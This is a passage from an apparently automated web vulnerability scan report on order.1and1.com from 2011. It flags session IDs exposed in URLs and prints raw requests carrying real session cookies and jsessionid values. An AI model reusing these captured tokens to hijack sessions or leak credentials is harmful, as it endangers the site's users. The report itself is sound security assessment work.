Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Domaininfo?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.8. http://order.1and1.com/xml/order/DomaininfoMove

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:23:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domainTransfer
Content-Length: 0
Connection: close
Content-Type: text/plain


3.9. http://order.1and1.com/xml/order/Eshops

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:33:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain


3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureCommunicationToolsChat&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureCommunicationToolsChat&amp;page=switch&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureCommunicationToolsChat&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=FeatureCommunicationToolsChat&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.15. http://order.1and1.com/xml/order/FeatureControlCenter

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureControlCenter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:39:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureControlCenter?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseAccess

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureDatabaseAccess;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:40:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
